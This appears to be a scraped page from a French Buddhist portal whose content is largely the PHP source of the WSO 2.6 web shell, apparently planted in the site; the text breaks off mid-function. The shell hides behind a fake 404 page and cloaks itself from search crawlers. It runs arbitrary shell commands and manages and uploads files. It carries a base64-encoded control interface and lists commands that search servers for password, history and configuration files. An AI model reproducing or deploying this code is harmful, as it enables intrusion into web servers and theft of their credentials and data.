Buddhachannel : le portail du bouddhisme dans le monde


Sondage


Voter Pourquoi sommes-nous sur Terre ?





Agenda

Dernier ajout : 26 novembre.

<?php
/* WSO 2.6 (Web Shell by stealthers.in) made by Death Burner*/ 
$auth_pass "c994df9ed53d921821da12b0e4090e04";
$color "green";
$default_action 'FilesMan';
$default_use_ajax true;
$default_charset 'Windows-1251';

if(!empty(
$_SERVER['HTTP_USER_AGENT'])) {
    
$userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if(
preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@
session_start();
@
ini_set('error_log',NULL);
@
ini_set('log_errors',0);
@
ini_set('max_execution_time',0);
@
set_time_limit(0);
@
set_magic_quotes_runtime(0);
@
define('WSO_VERSION''2.6');

if(
get_magic_quotes_gpc()) {
    function 
WSOstripslashes($array) {
        return 
is_array($array) ? array_map('WSOstripslashes'$array) : stripslashes($array);
    }
    
$_POST WSOstripslashes($_POST);
}

function 
printLogin() { 
    
?>

Not Found

The requested URL was not found on this server.


Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80
<?php 
    
exit; 


if(!isset(
$_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty(
$auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
        
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        
printLogin();

if(
strtolower(substr(PHP_OS,0,3)) == "win")
    
$os 'win';
else
    
$os 'nix';

$safe_mode = @ini_get('safe_mode');
if(!
$safe_mode)
    
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset(
$_POST['c']))
    @
chdir($_POST['c']);
$cwd = @getcwd();
if(
$os == 'win') {
    
$home_cwd str_replace("\\""/"$home_cwd);
    
$cwd str_replace("\\""/"$cwd);
}
if( 
$cwd[strlen($cwd)-1] != '/' )
    
$cwd .= '/';

if(!isset(
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];

if(
$os == 'win')
    
$aliases = array(
        
"List Directory" => "dir",
        
"Find index.php in current dir" => "dir /s /w /b index.php",
        
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        
"Show active connections" => "netstat -an",
        
"Show running services" => "net start",
        
"User accounts" => "net user",
        
"Show computers" => "net view",
        
"ARP Table" => "arp -a",
        
"IP Configuration" => "ipconfig /all"
    
);
else
    
$aliases = array(
          
"List dir" => "ls -lha",
        
"list file attributes on a Linux second extended file system" => "lsattr -va",
          
"show opened ports" => "netstat -an | grep -i listen",
        
"process status" => "ps aux",
        
"Find" => "",
          
"find all suid files" => "find / -type f -perm -04000 -ls",
          
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
          
"find all sgid files" => "find / -type f -perm -02000 -ls",
          
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          
"find config.inc.php files" => "find / -type f -name config.inc.php",
          
"find config* files" => "find / -type f -name \"config*\"",
          
"find config* files in current dir" => "find . -type f -name \"config*\"",
          
"find all writable folders and files" => "find / -perm -2 -ls",
          
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
          
"find all service.pwd files" => "find / -type f -name service.pwd",
          
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
          
"find all .htpasswd files" => "find / -type f -name .htpasswd",
          
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          
"find all .bash_history files" => "find / -type f -name .bash_history",
          
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
          
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        
"Locate" => "",
          
"locate httpd.conf files" => "locate httpd.conf",
        
"locate vhosts.conf files" => "locate vhosts.conf",
        
"locate proftpd.conf files" => "locate proftpd.conf",
        
"locate psybnc.conf files" => "locate psybnc.conf",
        
"locate my.conf files" => "locate my.conf",
        
"locate admin.php files" =>"locate admin.php",
        
"locate cfg.php files" => "locate cfg.php",
        
"locate conf.php files" => "locate conf.php",
        
"locate config.dat files" => "locate config.dat",
        
"locate config.php files" => "locate config.php",
        
"locate config.inc files" => "locate config.inc",
        
"locate config.inc.php" => "locate config.inc.php",
        
"locate config.default.php files" => "locate config.default.php",
        
"locate config* files " => "locate config",
        
"locate .conf files"=>"locate '.conf'",
        
"locate .pwd files" => "locate '.pwd'",
        
"locate .sql files" => "locate '.sql'",
        
"locate .htpasswd files" => "locate '.htpasswd'",
        
"locate .bash_history files" => "locate '.bash_history'",
        
"locate .mysql_history files" => "locate '.mysql_history'",
        
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
        
"locate backup files" => "locate backup",
        
"locate dump files" => "locate dump",
        
"locate priv files" => "locate priv"
    
);

function 
wsoHeader() {
    if(empty(
$_POST['charset']))
        
$_POST['charset'] = $GLOBALS['default_charset'];
    global 
$color;
    echo 
"<div class="base64" title='PGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0nQ29udGVudC1UeXBlJyBjb250ZW50PSd0ZXh0L2h0bWw7IGNoYXJzZXQ9IiAuICRfUE9TVFsnY2hhcnNldCddIC4gIic+PHRpdGxlPiIgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiAiIC0gV1NPICIgLiBXU09fVkVSU0lPTiAuIjwvdGl0bGU+DQo8c3R5bGU+DQpib2R5e2JhY2tncm91bmQtY29sb3I6IzQ0NDtjb2xvcjojZTFlMWUxO30NCmJvZHksdGQsdGh7IGZvbnQ6IDlwdCBMdWNpZGEsVmVyZGFuYTttYXJnaW46MDt2ZXJ0aWNhbC1hbGlnbjp0b3A7Y29sb3I6I2UxZTFlMTsgfQ0KdGFibGUuaW5mb3sgY29sb3I6I2ZmZjtiYWNrZ3JvdW5kLWNvbG9yOiMyMjI7IH0NCnNwYW4saDEsYXsgY29sb3I6ICRjb2xvciAhaW1wb3J0YW50OyB9DQpzcGFueyBmb250LXdlaWdodDogYm9sZGVyOyB9DQpoMXsgYm9yZGVyLWxlZnQ6NXB4IHNvbGlkICRjb2xvcjtwYWRkaW5nOiAycHggNXB4O2ZvbnQ6IDE0cHQgVmVyZGFuYTtiYWNrZ3JvdW5kLWNvbG9yOiMyMjI7bWFyZ2luOjBweDsgfQ0KZGl2LmNvbnRlbnR7IHBhZGRpbmc6IDVweDttYXJnaW4tbGVmdDo1cHg7YmFja2dyb3VuZC1jb2xvcjojMzMzOyB9DQpheyB0ZXh0LWRlY29yYXRpb246bm9uZTsgfQ0KYTpob3ZlcnsgdGV4dC1kZWNvcmF0aW9uOnVuZGVybGluZTsgfQ0KLm1sMXsgYm9yZGVyOjFweCBzb2xpZCAjNDQ0O3BhZGRpbmc6NXB4O21hcmdpbjowO292ZXJmbG93OiBhdXRvOyB9DQouYmlnYXJlYXsgd2lkdGg6MTAwJTtoZWlnaHQ6MjUwcHg7IH0NCmlucHV0LHRleHRhcmVhLHNlbGVjdHsgbWFyZ2luOjA7Y29sb3I6I2ZmZjtiYWNrZ3JvdW5kLWNvbG9yOiM1NTU7Ym9yZGVyOjFweCBzb2xpZCAkY29sb3I7IGZvbnQ6IDlwdCBNb25vc3BhY2UsJ0NvdXJpZXIgTmV3JzsgfQ0KZm9ybXsgbWFyZ2luOjBweDsgfQ0KI3Rvb2xzVGJseyB0ZXh0LWFsaWduOmNlbnRlcjsgfQ0KLnRvb2xzSW5weyB3aWR0aDogMzAwcHggfQ0KLm1haW4gdGh7dGV4dC1hbGlnbjpsZWZ0O2JhY2tncm91bmQtY29sb3I6IzVlNWU1ZTt9DQoubWFpbiB0cjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiM1ZTVlNWV9DQoubDF7YmFja2dyb3VuZC1jb2xvcjojNDQ0fQ0KLmwye2JhY2tncm91bmQtY29sb3I6IzMzM30NCnByZXtmb250LWZhbWlseTpDb3VyaWVyLE1vbm9zcGFjZTt9DQo8L3N0eWxlPg0KPHNjcmlwdD4NCiAgICB2YXIgY18gPSAnIiAuIGh0bWxzcGVjaWFsY2hhcnMoJEdMT0JBTFNbJ2N3ZCddKSAuICInOw0KICAgIHZhciBhXyA9ICciIC4gaHRtbHNwZWNpYWxjaGFycyhAJF9QT1NUWydhJ10pIC4iJw0KICAgIHZhciBjaGFyc2V0XyA9ICciIC4gaHRtbHNwZWNpYWxjaGFycyhAJF9QT1NUWydjaGFyc2V0J10pIC4iJzsNCiAgICB2YXIgcDFfID0gJyIgLiAoKHN0cnBvcyhAJF9QT1NUWydwMSddLCJcbiIpIT09ZmFsc2UpPycnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydwMSddLEVOVF9RVU9URVMpKSAuIic7DQogICAgdmFyIHAyXyA9ICciIC4gKChzdHJwb3MoQCRfUE9TVFsncDInXSwiXG4iKSE9PWZhbHNlKT8nJzpodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsncDInXSxFTlRfUVVPVEVTKSkgLiInOw0KICAgIHZhciBwM18gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AzJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AzJ10sRU5UX1FVT1RFUykpIC4iJzsNCiAgICB2YXIgZCA9IGRvY3VtZW50Ow0KCWZ1bmN0aW9uIHNldChhLGMscDEscDIscDMsY2hhcnNldCkgew0KCQlpZihhIT1udWxsKWQubWYuYS52YWx1ZT1hO2Vsc2UgZC5tZi5hLnZhbHVlPWFfOw0KCQlpZihjIT1udWxsKWQubWYuYy52YWx1ZT1jO2Vsc2UgZC5tZi5jLnZhbHVlPWNfOw0KCQlpZihwMSE9bnVsbClkLm1mLnAxLnZhbHVlPXAxO2Vsc2UgZC5tZi5wMS52YWx1ZT1wMV87DQoJCWlmKHAyIT1udWxsKWQubWYucDIudmFsdWU9cDI7ZWxzZSBkLm1mLnAyLnZhbHVlPXAyXzsNCgkJaWYocDMhPW51bGwpZC5tZi5wMy52YWx1ZT1wMztlbHNlIGQubWYucDMudmFsdWU9cDNfOw0KCQlpZihjaGFyc2V0IT1udWxsKWQubWYuY2hhcnNldC52YWx1ZT1jaGFyc2V0O2Vsc2UgZC5tZi5jaGFyc2V0LnZhbHVlPWNoYXJzZXRfOw0KCX0NCglmdW5jdGlvbiBnKGEsYyxwMSxwMixwMyxjaGFyc2V0KSB7DQoJCXNldChhLGMscDEscDIscDMsY2hhcnNldCk7DQoJCWQubWYuc3VibWl0KCk7DQoJfQ0KCWZ1bmN0aW9uIGEoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsNCgkJc2V0KGEsYyxwMSxwMixwMyxjaGFyc2V0KTsNCgkJdmFyIHBhcmFtcyA9ICdhamF4PXRydWUnOw0KCQlmb3IoaT0wO2k8ZC5tZi5lbGVtZW50cy5sZW5ndGg7aSsrKQ0KCQkJcGFyYW1zICs9ICcmJytkLm1mLmVsZW1lbnRzW2ldLm5hbWUrJz0nK2VuY29kZVVSSUNvbXBvbmVudChkLm1mLmVsZW1lbnRzW2ldLnZhbHVlKTsNCgkJc3IoJyIgLiBhZGRzbGFzaGVzKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIicsIHBhcmFtcyk7DQoJfQ0KCWZ1bmN0aW9uIHNyKHVybCwgcGFyYW1zKSB7DQoJCWlmICh3aW5kb3cuWE1MSHR0cFJlcXVlc3QpDQoJCQlyZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsNCgkJZWxzZSBpZiAod2luZG93LkFjdGl2ZVhPYmplY3QpDQoJCQlyZXEgPSBuZXcgQWN0aXZlWE9iamVjdCgnTWljcm9zb2Z0LlhNTEhUVFAnKTsNCiAgICAgICAgaWYgKHJlcSkgew0KICAgICAgICAgICAgcmVxLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IHByb2Nlc3NSZXFDaGFuZ2U7DQogICAgICAgICAgICByZXEub3BlbignUE9TVCcsIHVybCwgdHJ1ZSk7DQogICAgICAgICAgICByZXEuc2V0UmVxdWVzdEhlYWRlciAoJ0NvbnRlbnQtVHlwZScsICdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnKTsNCiAgICAgICAgICAgIHJlcS5zZW5kKHBhcmFtcyk7DQogICAgICAgIH0NCgl9DQoJZnVuY3Rpb24gcHJvY2Vzc1JlcUNoYW5nZSgpIHsNCgkJaWYoIChyZXEucmVhZHlTdGF0ZSA9PSA0KSApDQoJCQlpZihyZXEuc3RhdHVzID09IDIwMCkgew0KCQkJCXZhciByZWcgPSBuZXcgUmVnRXhwKFwiKFxcXFxkKykoW1xcXFxTXFxcXHNdKilcIiwgJ20nKTsNCgkJCQl2YXIgYXJyPXJlZy5leGVjKHJlcS5yZXNwb25zZVRleHQpOw0KCQkJCWV2YWwoYXJyWzJdLnN1YnN0cigwLCBhcnJbMV0pKTsNCgkJCX0gZWxzZSBhbGVydCgnUmVxdWVzdCBlcnJvciEnKTsNCgl9DQo8L3NjcmlwdD4NCjxoZWFkPjxib2R5PjxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlO3dpZHRoOjEwMCU7YmFja2dyb3VuZC1jb2xvcjojNDQ0O3RvcDowO2xlZnQ6MDsnPg0KPGZvcm0gbWV0aG9kPXBvc3QgbmFtZT1tZiBzdHlsZT0nZGlzcGxheTpub25lOyc+DQo8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hPg0KPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9Yz4NCjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPXAxPg0KPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9cDI+DQoNCjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPXAzPg0KPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9Y2hhcnNldD4NCjwvZm9ybT4iOw0KCSRmcmVlU3BhY2UgPSBAZGlza2ZyZWVzcGFjZSgkR0xPQkFMU1snY3dkJ10pOw0KCSR0b3RhbFNwYWNlID0gQGRpc2tfdG90YWxfc3BhY2UoJEdMT0JBTFNbJ2N3ZCddKTsNCgkkdG90YWxTcGFjZSA9ICR0b3RhbFNwYWNlPyR0b3RhbFNwYWNlOjE7DQoJJHJlbGVhc2UgPSBAcGhwX3VuYW1lKCdyJyk7DQoJJGtlcm5lbCA9IEBwaHBfdW5hbWUoJ3MnKTsNCglpZighZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpIHsNCgkJJHVzZXIgPSBAZ2V0X2N1cnJlbnRfdXNlcigpOw0KCQkkdWlkID0gQGdldG15dWlkKCk7DQoJCSRnaWQgPSBAZ2V0bXlnaWQoKTsNCgkJJGdyb3VwID0gIj8iOw0KCX0gZWxzZSB7DQoJCSR1aWQgPSBAcG9zaXhfZ2V0cHd1aWQocG9zaXhfZ2V0ZXVpZCgpKTsNCgkJJGdpZCA9IEBwb3NpeF9nZXRncmdpZChwb3NpeF9nZXRlZ2lkKCkpOw0KCQkkdXNlciA9ICR1aWRbJ25hbWUnXTsNCgkJJHVpZCA9ICR1aWRbJ3VpZCddOw0KCQkkZ3JvdXAgPSAkZ2lkWyduYW1lJ107DQoJCSRnaWQgPSAkZ2lkWydnaWQnXTsNCgl9DQoNCgkkY3dkX2xpbmtzID0gJyc7DQoJJHBhdGggPSBleHBsb2RlKCIvIiwgJEdMT0JBTFNbJ2N3ZCddKTsNCgkkbj1jb3VudCgkcGF0aCk7DQoJZm9yKCRpPTA7ICRpPCRuLTE7ICRpKyspIHsNCgkJJGN3ZF9saW5rcyAuPSAiPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzTWFuXCIsXCIiOw0KCQlmb3IoJGo9MDsgJGo8PSRpOyAkaisrKQ0KCQkJJGN3ZF9saW5rcyAuPSAkcGF0aFskal0uJy8nOw0KCQkkY3dkX2xpbmtzIC49ICJcIiknPiIuJHBhdGhbJGldLiIvPC9hPiI7DQoJfQ0KDQoJJGNoYXJzZXRzID0gYXJyYXkoJ1VURi04JywgJ1dpbmRvd3MtMTI1MScsICdLT0k4LVInLCAnS09JOC1VJywgJ2NwODY2Jyk7DQoJJG9wdF9jaGFyc2V0cyA9ICcnOw0KCWZvcmVhY2goJGNoYXJzZXRzIGFzICRpdGVtKQ0KCQkkb3B0X2NoYXJzZXRzIC49ICc8b3B0aW9uIHZhbHVlPSInLiRpdGVtLiciICcuKCRfUE9TVFsnY2hhcnNldCddPT0kaXRlbT8nc2VsZWN0ZWQnOicnKS4nPicuJGl0ZW0uJzwvb3B0aW9uPic7DQoNCgkkbSA9IGFycmF5KCdTZWMgSW5mbyc9PidTZWNJbmZvJywnRmlsZXMnPT4nRmlsZXNNYW4nLCdFeGVjJz0+J0NvbnNvbGUnLCdTcWwnPT4nU3FsJywnUEhQIFRvb2xzJz0+J3BocHRvb2xzJywnTEZJJz0+J2xmaXNjYW4nLCdQaHAnPT4nUGhwJywnU2FmZSBtb2RlJz0+J1NhZmVNb2RlJywnU3RyaW5nIHRvb2xzJz0+J1N0cmluZ1Rvb2xzJywnQnJ1dGVmb3JjZSc9PidCcnV0ZWZvcmNlJywnTmV0d29yayc9PidOZXR3b3JrJyk7DQoJaWYoIWVtcHR5KCRHTE9CQUxTWydhdXRoX3Bhc3MnXSkpDQoJCSRtWydMb2dvdXQnXSA9ICdMb2dvdXQnOw0KCSRtWydTZWxmIHJlbW92ZSddID0gJ1NlbGZSZW1vdmUnOw0KCSRtZW51ID0gJyc7DQoJZm9yZWFjaCgkbSBhcyAkayA9PiAkdikNCgkJJG1lbnUgLj0gJzx0aCB3aWR0aD0iJy4oaW50KSgxMDAvY291bnQoJG0pKS4nJSI+WzxhIGhyZWY9IiMiIG9uY2xpY2s9ImcoXCcnLiR2LidcJyxudWxsLFwnXCcsXCdcJyxcJ1wnKSI+Jy4kay4nPC9hPl08L3RoPic7DQoNCgkkZHJpdmVzID0gIiI7DQoJaWYoJEdMT0JBTFNbJ29zJ10gPT0gJ3dpbicpIHsNCgkJZm9yZWFjaChyYW5nZSgnYycsJ3onKSBhcyAkZHJpdmUpDQoJCWlmKGlzX2RpcigkZHJpdmUuJzpcXCcpKQ0KCQkJJGRyaXZlcyAuPSAnPGEgaHJlZj0iIyIgb25jbGljaz0iZyhcJ0ZpbGVzTWFuXCcsXCcnLiRkcml2ZS4nOi9cJykiPlsgJy4kZHJpdmUuJyBdPC9hPiAnOw0KCX0NCgllY2hvICc8dGFibGUgY2xhc3M9aW5mbyBjZWxscGFkZGluZz0zIGNlbGxzcGFjaW5nPTAgd2lkdGg9MTAwJT48dHI+PHRkIHdpZHRoPTE+PHNwYW4+VW5hbWU6PGJyPlVzZXI6PGJyPlBocDo8YnI+SGRkOjxicj5Dd2Q6JyAuICgkR0xPQkFMU1snb3MnXSA9PSAnd2luJz8nPGJyPkRyaXZlczonOicnKSAuICc8L3NwYW4+PC90ZD4nDQogICAgICAgLiAnPHRkPjxub2JyPicgLiBzdWJzdHIoQHBocF91bmFtZSgpLCAwLCAxMjApIC4gJyA8L25vYnI+PGJyPicgLiAkdWlkIC4gJyAoICcgLiAkdXNlciAuICcgKSA8c3Bhbj5Hcm91cDo8L3NwYW4+ICcgLiAkZ2lkIC4gJyAoICcgLiAkZ3JvdXAgLiAnICk8YnI+JyAuIEBwaHB2ZXJzaW9uKCkgLiAnIDxzcGFuPlNhZmUgbW9kZTo8L3NwYW4+ICcgLiAoJEdMT0JBTFNbJ3NhZmVfbW9kZSddPyc8Zm9udCBjb2xvcj1yZWQ+T048L2ZvbnQ+JzonPGZvbnQgY29sb3I9IzAwYmIwMD48Yj5PRkY8L2I+PC9mb250PicpDQogICAgICAgLiAnIDxhIGhyZWY9IyBvbmNsaWNrPSJnKFwnUGhwXCcsbnVsbCxcJ1wnLFwnaW5mb1wnKSI+WyBwaHBpbmZvIF08L2E+IDxzcGFuPkRhdGV0aW1lOjwvc3Bhbj4gJyAuIGRhdGUoJ1ktbS1kIEg6aTpzJykgLiAnPGJyPicgLiB3c29WaWV3U2l6ZSgkdG90YWxTcGFjZSkgLiAnIDxzcGFuPkZyZWU6PC9zcGFuPiAnIC4gd3NvVmlld1NpemUoJGZyZWVTcGFjZSkgLiAnICgnLiAoaW50KSAoJGZyZWVTcGFjZS8kdG90YWxTcGFjZSoxMDApIC4gJyUpPGJyPicgLiAkY3dkX2xpbmtzIC4gJyAnLiB3c29QZXJtc0NvbG9yKCRHTE9CQUxTWydjd2QnXSkgLiAnIDxhIGhyZWY9IyBvbmNsaWNrPSJnKFwnRmlsZXNNYW5cJyxcJycgLiAkR0xPQkFMU1snaG9tZV9jd2QnXSAuICdcJyxcJ1wnLFwnXCcsXCdcJykiPlsgaG9tZSBdPC9hPjxicj4nIC4gJGRyaXZlcyAuICc8L3RkPicNCiAgICAgICAuICc8dGQgd2lkdGg9MSBhbGlnbj1yaWdodD48bm9icj48c2VsZWN0IG9uY2hhbmdlPSJnKG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCx0aGlzLnZhbHVlKSI+PG9wdGdyb3VwIGxhYmVsPSJQYWdlIGNoYXJzZXQiPicgLiAkb3B0X2NoYXJzZXRzIC4gJzwvb3B0Z3JvdXA+PC9zZWxlY3Q+PGJyPjxzcGFuPlNlcnZlciBJUDo8L3NwYW4+PGJyPicgLiBAJF9TRVJWRVJbIlNFUlZFUl9BRERSIl0gLiAnPGJyPjxzcGFuPkNsaWVudCBJUDo8L3NwYW4+PGJyPicgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXSAuICc8L25vYnI+PC90ZD48L3RyPjwvdGFibGU+Jw0KICAgICAgIC4gJzx0YWJsZSBzdHlsZT0iYm9yZGVyLXRvcDoycHggc29saWQgIzMzMzsiIGNlbGxwYWRkaW5nPTMgY2VsbHNwYWNpbmc9MCB3aWR0aD0xMDAlPjx0cj4nIC4gJG1lbnUgLiAnPC90cj48L3RhYmxlPjxkaXYgc3R5bGU9Im1hcmdpbjo1Ij4nOw0KfQ0KDQpmdW5jdGlvbiB3c29Gb290ZXIoKSB7DQoJJGlzX3dyaXRhYmxlID0gaXNfd3JpdGFibGUoJEdMT0JBTFNbJ2N3ZCddKT8iIDxmb250IGNvbG9yPScjMjVmZjAwJz4oV3JpdGVhYmxlKTwvZm9udD4iOiIgPGZvbnQgY29sb3I9cmVkPihOb3Qgd3JpdGFibGUpPC9mb250PiI7DQogICAgZWNobyAiDQoNCjwvZGl2Pg0KPHRhYmxlIGNsYXNzPWluZm8gaWQ9dG9vbHNUYmwgY2VsbHBhZGRpbmc9MyBjZWxsc3BhY2luZz0wIHdpZHRoPTEwMCUgIHN0eWxlPSdib3JkZXItdG9wOjJweCBzb2xpZCAjMzMzO2JvcmRlci1ib3R0b206MnB4IHNvbGlkICMzMzM7Jz4NCgk8dHI+DQoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD0nZyhudWxsLHRoaXMuYy52YWx1ZSxcIlwiKTtyZXR1cm4gZmFsc2U7Jz48c3Bhbj5DaGFuZ2UgZGlyOjwvc3Bhbj48YnI+PGlucHV0IGNsYXNzPSd0b29sc0lucCcgdHlwZT10ZXh0IG5hbWU9YyB2YWx1ZT0nIiAuIGh0bWxzcGVjaWFsY2hhcnMoJEdMT0JBTFNbJ2N3ZCddKSAuIic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjwvdGQ+DQoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0ZpbGVzVG9vbHMnLG51bGwsdGhpcy5mLnZhbHVlKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+UmVhZCBmaWxlOjwvc3Bhbj48YnI+PGlucHV0IGNsYXNzPSd0b29sc0lucCcgdHlwZT10ZXh0IG5hbWU9Zj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz48L2Zvcm0+PC90ZD4NCgk8L3RyPjx0cj4NCgkJPHRkPjxmb3JtIG9uc3VibWl0PVwiZygnRmlsZXNNYW4nLG51bGwsJ21rZGlyJyx0aGlzLmQudmFsdWUpO3JldHVybiBmYWxzZTtcIj48c3Bhbj5NYWtlIGRpcjo8L3NwYW4+JGlzX3dyaXRhYmxlPGJyPjxpbnB1dCBjbGFzcz0ndG9vbHNJbnAnIHR5cGU9dGV4dCBuYW1lPWQ+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjwvdGQ+DQoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0ZpbGVzVG9vbHMnLG51bGwsdGhpcy5mLnZhbHVlLCdta2ZpbGUnKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+TWFrZSBmaWxlOjwvc3Bhbj4kaXNfd3JpdGFibGU8YnI+PGlucHV0IGNsYXNzPSd0b29sc0lucCcgdHlwZT10ZXh0IG5hbWU9Zj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz48L2Zvcm0+PC90ZD4NCg0KCTwvdHI+PHRyPg0KCQk8dGQ+PGZvcm0gb25zdWJtaXQ9XCJnKCdDb25zb2xlJyxudWxsLHRoaXMuYy52YWx1ZSk7cmV0dXJuIGZhbHNlO1wiPjxzcGFuPkV4ZWN1dGU6PC9zcGFuPjxicj48aW5wdXQgY2xhc3M9J3Rvb2xzSW5wJyB0eXBlPXRleHQgbmFtZT1jIHZhbHVlPScnPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nPj4nPjwvZm9ybT48L3RkPg0KCQk8dGQ+PGZvcm0gbWV0aG9kPSdwb3N0JyBFTkNUWVBFPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4NCgkJPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YSB2YWx1ZT0nRmlsZXNNQW4nPg0KCQk8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1jIHZhbHVlPSciIC4gJEdMT0JBTFNbJ2N3ZCddIC4iJz4NCgkJPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9cDEgdmFsdWU9J3VwbG9hZEZpbGUnPg0KCQk8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1jaGFyc2V0IHZhbHVlPSciIC4gKGlzc2V0KCRfUE9TVFsnY2hhcnNldCddKT8kX1BPU1RbJ2NoYXJzZXQnXTonJykgLiAiJz4NCgkJPHNwYW4+VXBsb2FkIGZpbGU6PC9zcGFuPiRpc193cml0YWJsZTxicj48aW5wdXQgY2xhc3M9J3Rvb2xzSW5wJyB0eXBlPWZpbGUgbmFtZT1mPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nPj4nPjwvZm9ybT48YnIgID48L3RkPg0KDQoJPC90cj48L3RhYmxlPjxjZW50ZXI+V1NPIFN0ZWFsdGhlcnMuaW4gZWRpdGlvbiAtIE1vZGlmaWVkIGJ5IERlYXRoIEJ1cm5lcjwvY2VudGVyPjwvZGl2PjwvYm9keT4=' ></div>

"
;
}

if (!
function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function 
posix_getpwuid($p) {return false;} }
if (!
function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function 
posix_getgrgid($p) {return false;} }

function 
wsoEx($in) {
    
$out '';
    if (
function_exists('exec')) {
        @
exec($in,$out);
        
$out = @join("\n",$out);
    } elseif (
function_exists('passthru')) {
        
ob_start();
        @
passthru($in);
        
$out ob_get_clean();
    } elseif (
function_exists('system')) {
        
ob_start();
        @
system($in);
        
$out ob_get_clean();
    } elseif (
function_exists('shell_exec')) {
        
$out shell_exec($in);
    } elseif (
is_resource($f = @popen($in,"r"))) {
        
$out "";
        while(!@
feof($f))
            
$out .= fread($f,1024);
        
pclose($f);
    }
    return 
$out;
}
function 
wsoViewSize($s) {
    if(
$s >= 1073741824)
        return 
sprintf('%1.2f'$s 1073741824 ). ' GB';
    elseif(
$s >= 1048576)
        return 
sprintf('%1.2f'$s 1048576 ) . ' MB';
    elseif(
$s >= 1024)
        return 
sprintf('%1.2f'$s 1024 ) . ' KB';
    else
        return 
$s ' B';
}

function 
wsoPerms($p) {
    if ((
$p 0xC000) == 0xC000)$i 's';
    elseif ((
$p 0xA000) == 0xA000)$i 'l';
    elseif ((
$p 0x8000) == 0x8000)$i '-';
    elseif ((
$p 0x6000) == 0x6000)$i 'b';
    elseif ((
$p 0x4000) == 0x4000)$i 'd';
    elseif ((
$p 0x2000) == 0x2000)$i 'c';
    elseif ((
$p 0x1000) == 0x1000)$i 'p';
    else 
$i 'u';
    
$i .= (($p 0x0100) ? 'r' '-');
    
$i .= (($p 0x0080) ? 'w' '-');
    
$i .= (($p 0x0040) ? (($p 0x0800) ? 's' 'x' ) : (($p 0x0800) ? 'S' '-'));
    
$i .= (($p 0x0020) ? 'r' '-');
    
$i .= (($p 0x0010) ? 'w' '-');
    
$i .= (($p 0x0008) ? (($p 0x0400) ? 's' 'x' ) : (($p 0x0400) ? 'S' '-'));
    
$i .= (($p 0x0004) ? 'r' '-');
    
$i .= (($p 0x0002) ? 'w' '-');
    
$i .= (($p 0x0001) ? (($p 0x0200) ? 't' 'x' ) : (($p 0x0200) ? 'T' '-'));
    return 
$i;
}

function 
wsoPermsColor($f) {
    if (!@
is_readable($f))
        return 
'<font color=#FF0000>' wsoPerms(@fileperms($f)) . '</font>';
    elseif (!@
is_writable($f))
        return 
